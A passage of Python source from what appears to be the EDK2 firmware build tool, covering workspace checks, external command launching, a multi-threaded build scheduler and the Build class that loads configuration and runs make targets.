if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(os.path.join(Workspace, FilePath))
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line != None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if not isinstance(Command, list):
if platform.system() != 'Windows':
Command = Command.split()
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
if EndOfProcedure != None:
EndOfProcedure.set()
if Proc == None:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other != None and self.BuildObject == Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = sdict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = sdict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = sdict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = sdict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo = BuildTask._ReadyQueue.keys()[0]
Bt = BuildTask._ReadyQueue.pop(Bo)
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join([Th.getName() for Th in threading.enumerate()]))
# avoid tense loop
time.sleep(0.1)
except BaseException, X:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency == None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = os.path.join(self.WorkspaceDir, ConfDirectoryPath)
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = os.path.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if BuildOptions.DisableCache:
self.Db = WorkspaceDatabase(":memory:")
else:
self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
self.InitBuild()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(os.path.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList == None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
if self.ThreadNumber == None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
self.Db.InitDatabase()
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
InfFileNameList = ModuleList.keys()
#InfFileNameList.sort()
for InfFile in InfFileNameList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
